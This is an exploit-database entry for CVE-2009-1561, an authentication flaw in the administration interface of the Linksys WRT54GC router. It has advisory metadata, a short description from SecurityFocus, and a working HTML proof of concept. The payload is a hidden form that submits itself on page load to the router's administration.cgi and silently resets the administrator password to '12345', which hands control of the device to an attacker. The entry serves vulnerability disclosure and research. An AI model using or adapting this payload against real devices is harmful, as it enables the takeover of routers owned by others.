EXPLOITS

Linksys WRT54GC 1.5.7 Firmware - 'administration.cgi' Access Validation

Author: Gabriel Lima
type: remote
platform: hardware
port: 
date_added: 2009-04-20  
date_updated: 2017-01-24  
verified: 1  
codes: CVE-2009-1561;OSVDB-54092  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 32931.html  

source: https://www.securityfocus.com/bid/34616/info

The Linksys WRT54GC router is prone to an access-validation vulnerability because of a lack of authentication when users access specific administration applications.

Successful attacks will lead to a compromise of the vulnerable device, which may lead to further attacks.

Linksys WRT54GC running firmware 1.05.7 is vulnerable; other versions may also be affected.

<html><body> <form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data"> <INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21> <INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21> </form> <!-- C?digo de envio autom?tico do formul?rio --> <SCRIPT language="JavaScript"> document.senha.submit(); </SCRIPT>